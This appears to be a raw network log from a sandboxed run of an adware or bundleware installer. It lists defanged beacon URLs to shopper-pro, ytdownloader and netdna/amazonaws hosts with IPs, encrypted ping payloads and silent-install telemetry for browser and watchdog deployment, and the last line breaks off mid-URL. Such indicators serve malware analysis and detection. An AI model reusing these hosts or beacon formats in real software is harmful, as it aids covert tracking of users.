hxxp://rep.shopper-pro.com/app/ping.ashx?e=xQ3AxlCgdr chLpJKTn3oGAiHkI4CCT/TEgCpOx0T0GQL2F0hg1RiYQofSWvfvXx6Iyuuc4O24edLIaqTW0yuG M wGfCAoYWS3u52WlK7MdRS7ocO43fkEXlTeNLX sfKwlC2TeCg7lnoGCEF1IIyQxWeZ2hMdUZrdGZ5CXclVTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsl KqrDcjAVy4So4N0DyvUVt9bTy0e1BneUS4717SFgKd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ==	54.197.238.106
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=043Mckb8LnjKYf/qJ5z9H8crIdqQqjphJvDvNLatV5w2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3SXxmarrZLBmoGtPoa5D1iOcnF290GY/Hng fWZsLDRwOWufSVBCsQTuVqOEbeDQPHiyoaNv5jwY8qJaeUqNPyfb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO7/Xczm4cWZTlVtB8erRBUEOQ1CMJ8nIJWySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYoLT3btyMareEuHRVOmbexINxVO2bJPMGfK5w9Mw84Eg==	198.232.124.192
hxxp://rep.shopper-pro.com/app/ping.ashx?e=xQ3AxlCgdr chLpJKTn3oGAiHkI4CCT/TEgCpOx0T0GQL2F0hg1RiYQofSWvfvXx6Iyuuc4O24edLIaqTW0yuG M wGfCAoYWS3u52WlK7MIoksMfua33PkiLUwJiPacZFavxiN7Hz7U867asmonNzgmTMHWxjt398S7GEeR3AenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BQXmy6z0xvW0CtUUHk9AR8nlxg1yEv0UZA2OuAe3K9i5xW20GZ81oXcWMQ1BN/ Lt4sKLU3NDKjiEPV6TLtyTTjiZex9KrXTvPUmU8pxp4SZgE9L8wai8UDg/yVe4Z/h4obfQeCZJmDfQ3SGYOTb0Qu2h2jHnTboKsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5JDr9I5ZW0pTpBU9U/r/dsNyvhlGeipNVKkFGG1oMncRKXddqDrNTp0HPZj5yK0zkQp/ql BaU3XnW9YwSk5gj28Va7JmIs/Bl13yhrpfYAMeIGfrzyWRyvy2gKbXyPPDXUoXAX2Uiz3W6sPFKrniC4jaKTJ4Po/	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=xY8ohDYpM jBrZeNeEaMqQXvthyJPaJKJNfQDIfHDSP7RH4w/5EvdQk4teRL0v Hqa3a1O2i2Y5BhrP9twY3lD0xAWuIK9PHTosBFn3BGz5AkUNxy9zsS58Pk9jtfSr7GKzY45zi1OnWyB8eDAkaihrzHkXTPDbIohI/ JnYfdrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVrBRuaRLHbXnHiPVU04Syd0l8Zmq62SwZqBrT6GuQ9YjnJxdvdBmPx4igRpi97/ACb6vs2JJATJ04VTmYx8DZjA8oxErH8fL5pgPXGLp3QYEb98NyY 3Jv/oKdNf4wHzMG0hjZa1YiVe HfvMJQtwAmNTS2oycWuMQ==	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=yhrBLBbZM9XZ/Qu8ewVmaeTAfgQRWUFy3wBxlndAVdcSZTerw9Y85dVUaX7QH4byIYSfA6BN7OAcByXXS055WwOfjrcgetZ74jcY4FOXNMNgKkdlz1lRoXg/MOwCCT3fpsrZDsYYadbOj/D8d98sTJIE6m2lhk6FLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVrBRuaRLHbXnHiPVU04Syd0l8Zmq62SwZqBrT6GuQ9YjnJxdvdBmPx4igRpi97/ACb6vs2JJATJ04VTmYx8DZjA8oxErH8fL5pgPXGLp3QYEb98NyY 3Jv/oKdNf4wHzMG0hjZa1YiVe HfvMJQtwAmNTS2oycWuMQ==	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=Qoli4LW15guchLpJKTn3oGN8A8ah1bHeTEgCpOx0T0GQL2F0hg1RiYQofSWvfvXx6Iyuuc4O24edLIaqTW0yuG M wGfCAoYWS3u52WlK7NV9oK7vZm95VRGW796HUe3a50u3XyigpUpkYBnI7MsgSpeLmibBFk9a5OEmrbJtlEklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CSSNrM4iVH1I2Ld2YP2inphlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWolUJLAVEiQGRvaTpGfz3xhcJKC1Reo3n9s2Fs g80z0k6Cr9laSF2XrRbZnBny0uhv3iEz1ZNnAYhSLf3gsJzhYWVjeFKSrgJwIYPupgb31	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?e=Qoli4LW15guchLpJKTn3oGN8A8ah1bHeTEgCpOx0T0GQL2F0hg1RiYQofSWvfvXx6Iyuuc4O24edLIaqTW0yuG M wGfCAoYWS3u52WlK7M0A75TMG4v BbKdUb4fSU3inFskWrXAmUuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHP9bXdNfe lQudQlG124a8hFOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tCZMAOD3mcq6qIs V7Ds6CRuZZIi5/tojjeFKyzEEA2TzBaKXaEKdzFwqwK4Z/LB/gEuwwpt2SWXjaQSUVKXu219FCcWaHZevQ==	54.197.238.106
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=Bla1gpvbWwC3OkiMUUEbQYFyqRAyBI /KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOdM9SOPQahx7OjWRQ CK UV2cPl4nWMjqk/IV6ft2BimRteg227sOdLuf/scH7gncHIYVT16AkTDYCpHZc9ZUaH6/88N5jCoINCUHeR8YCF3OpZwd6ociX9 pobIk I43 1TuyEplpVVFm9k/ZfmpP0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU450z1I49BqHHs6NZFD4Ir5Rd/7ktAaGkOJ	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=60i6h5i9K u3OkiMUUEbQUXgQFBQBSWQKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOdM9SOPQahx7OjWRQ CK UV2cPl4nWMjqk/IV6ft2BimRteg227sOdLuf/scH7gncBgCRXRXrO/vWLazpewXw1hfOKWYd4uGNAB/MXM5vy8Es IILilpWF2wIdGQ/NYOW0D nsk guUXHw6Q2sZFYuNpgfdnT8YzzbQRS4Bw0lOuX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tA==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=XOxRKBm2zlz43cdm0TeNYoCqKDcj8uMnbZVhyzd0GYdXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWhje9aYYjnGxmKZKBq4UF14SxlAMHHLmWrzkSKXLrpfjIk52CBQfyUaa2dF0VKZsa4Q2/MQzLTqMBPEhRyyBD7AXvRHph9pI1Q0RNdvV2KXXSoNS7oinwYA0i/dYu8MdriDIreD3JgP/y0n5cCJyqErE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyX4qqsNyMBXLhKjg3QPK9Rah4lxHBW/CZ	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/20069.ashx?e=/9ZmISdorEtXP6639e gu4CqKDcj8uMnbZVhyzd0GYdXGmhmyGgv7pzaErgvbAYV621wjv8RxAGZlZFDj59jrYw2smzewqm3WLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jAim/q/4gaQlDRE129XYpddKg1LuiKfBgDSL91i7wx2uIMit4PcmA/ B5nIkMjph0BJ7ytXtOq9SKV0xCpDcC6H0EVi8F2tm8q/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGS5zOIEyMDZuzsHlRkWrcy9IYL8x1ybsb4FXLrRIVqTq10EZsxP4trEIkQsYPNggSlJQe0vxDLEzDsdDpQ6tGYTDDFQRMbEPS5buk E/GYgm2eAM7Jzw6swR7RnFho7Rn7WHgQmXA2MPg6HJhsczLjsYedDXuoFG0gAFY/ZqHQMugt9wYGdj4EP0rnMqlstLHTEz4kyYc5//dQHTdmYs6gjLjTdd8VgPBfBivPhM/YnfDHb79ui4dGUIoYINd0HuRLqbllCNa64YJWkcN48ynFSwX6xxcj6ZZ25/99W//4LZfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxZjnXlvApvj8	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/9248.ashx?e=WL9usJOVMsMLjT49fHfOTJ5NXDOYkTZjjvdcLv9L0ULeyzV7AofXljlrn0lQQrEE7lajhG3g0DzUUWoGxCZJzECN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DTTuHrYVulo109x0h yMmOvz6ENhyuEse8oIcxCtq PL6TW/ LqOCtOIOhJMBCe6etK166WwL5YKPiKgomzd5XT9xoSCfVrLCPk3SNaw1Hwyh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aO9FTZNpvmTsgqQA5WyV9dawj137NFRjrrStcIq/vZyTdriV4mPeB3fQbFCQv5BK9FdmE/yeJSe6i5CWtbGsRuHfTuvFpnVrlJCMj ozR/VoLGhXnLEz5pbP YAvZ/SRS XEWbcA1chWgA9yXcnOyI0jWC Aygi5UGnmMkfSoa9UeSJzd50JQG7rf7gVRTtqGyUpmLFbLFiWF8xS3bBaukBkUzbxF92/mppRjHrNBKt99xBVxbwNvWYgTanRRPJmLdDIVpmCXjGt3MoS/fu50NKaR9WivOCmrJ14PW2rksgaHr0J3FrrKLLw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://www.ytdownloader.com/app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,&rnd=21405&v=1.0.8654.1137&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser=	107.20.238.80
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=lOCrbsNL2zWYW6sXTpZ7/McrIdqQqjphDjQZdK 7JLk2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3SXxmarrZLBmoGtPoa5D1iOcnF290GY/Hng fWZsLDRwOWufSVBCsQTuVqOEbeDQPHiyoaNv5jwYGplaxtKDMMbfV9OCtHXZfA3mXJEY39mHAhwsRGINruh3JLgG5QML1aZst6qEpk9KfmoEh3ii522ksJhoW5zRhoAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=j32vo1XGv6u3OkiMUUEbQR/950HTBXzgKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOdM9SOPQahx7OjWRQ CK UV2cPl4nWMjqk/IV6ft2BimRteg227sOdLuf/scH7gncBgCRXRXrO/v8LB58LMRx23I02mIjBnQG1vlbGoI43V0s IILilpWF2ryaFrt1ZytfYM9jWPZncu7XnKkUKxv1se1xa5L1dfUsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rJfiqqw3IwFcuEqODdA8r1FqHiXEcFb8Jk=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/20069.ashx?e=eFCD8T/coiccIOUsnkwoNQXvthyJPaJK5UwtVBRsvcuAMRxV Cn6lnsc7hbJtTJHTc/ TiC/QQMa8vvz4viJlsB0LCHvfBiGpjkZwwc6dH53FRTfUsruhOl6T0Yw8cmQjgb6v7cXpPt1MMX4FKv0k1aVZNZJBdpztsz6KMSxEeHLNZj0gVT9Fy /jPnQ1EtXLdA rHOtLvrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/23616.ashx?e=hpY1rXLYst7rylc9w7m97YCqKDcj8uMn08Jirr/63TdXGmhmyGgv7pzaErgvbAYV621wjv8RxAF5vLZjpionsJ/9Wbc7sWIQWLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywG9b6mGOXRvU0PhvbfFCU5wZTviae3ZnOVQACmRxohL7ZCgczTNPeAOa8gWe/raWXWuTQRvGyt0T8PDyjZ9u9WpwwzuMCh12ot0O4Ki3byKrSjf7JB6IvVK68GKdrKnS1yez TNBXYF7YjAa9ouYjFS0aZeskjSnNiGHyOjuq7i31T5HURSha4Qgy4b8DbtljUr7Nvu2LesiriU/mQCVNZf1r8nqePVUAeYuk1Uk0hStIhovqPTJBRUmAJNmS1Yj8fj 09XbV4U5svI8552aiGLVm/7eP LiHcZDrQvLOz/WY2o9vOid1c3eS1Ku/uWOjs EFmOXjaFhFqwfJR5DYrtTWm3Kqr6zRU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/9874.ashx?e=VUrHHbcUInechLpJKTn3oGtOebixRaL2aMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lrBMCtxANQqTi4btG OZIk/mETyJyixTFVdn5IXPnT9 7PiCC4paVhdjnbMS4Pfob2H0XoEMGadmzHO2Dr7jPCamGrlhGzdRreQ4tlZncg0sEGwORpUjcC7CPnfnn4CX XGCkggys1PVXld7plMo70c5pdl3V4yoSZtC3ZUXmNv4hOEZ9fC9NN7s9C7tmmeIQ4UJj9eY3tRmk7I4yfJnN09minhshScISYDaFJEA74lB0xM JMmHOf/CqmVamFpcHD06e//qoDUTWzVjed5m HMSEHW2fSX6silL2b9fYt3DRfGpa6r1ttomZQQFfz/kCGvtlCUNlcxdDduSSgggr3kU4faTJ9xeijHEuW6CCH/UMJlTfV6gAodj6aKjJbkaS2Zw4YBH3MDkPlHiMBExjDPgZ11cIh4ppWIdnmPAA8Dk0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mhfCqXqcp6BQ=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/23616.ashx?e=hXeqmv1IpenVj9BNm3y5B1C4n3G4SOxmoOZ8Vy4PwRCJSpJdq6tfQE/IV6ft2BimRteg227sOdIuJIRIXfrbCYk0rxKiBQAQYCpHZc9ZUaFgmm5xjmBlpCI3FLqKedV9QoAE/or KqoStAZytkA54Y0S1nWxf2ZUZB6PWEkv//ugKlGaFWGmKmwUgXYbYBd8N7VfTGhny8GM1YNJ72n7uVP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/9874.ashx?e=M5cPy8d51cO3OkiMUUEbQQSMxHXdcfDkKB2ZKuKuT4UgLxC0aXqYrSdIMT2RiZMDI9Pw QuaY tkfQjBunVwGKY5GcMHOnR dxUU31LK7oTpek9GMPHJkI4G r 3F6T7vd0ZIK3zyHSv9W41Hn7OPSVNckomstbKncplbj8o7GeNKEGtOzYkhkucziBMjA2bF9XRoFpwhAXAXh4LPUO uUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mhfCqXqcp6BQ=	198.232.124.192
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1434694627
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1434694627
hxxp://ipgeoapi.com/	54.225.153.194
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_66&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1434694627&procruntime=5&rnd=1434694632
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_68&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1434694627&procruntime=5&rnd=1434694632
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=5&rnd=1434694632
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=5&rnd=1434694632
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1434694627&asw=0_1073750528_-2147483648_2048&browser=&rnd=1434694627
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1434694627&asw=0_1073750528_-2147483648_2048&browser=&rnd=1434694627
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1434694633
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1434694633
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1434694633
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1434694633
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1434694634
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1434694634
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1434694635
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1434694635
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1434694635
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1434694635
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1434694636
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1434694637
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1434694637
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1434694637
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1434694637
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_68&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=11&rnd=1434694638
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_66&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1434694627&lifetime=0&silent=1&crtnm=na&procstartt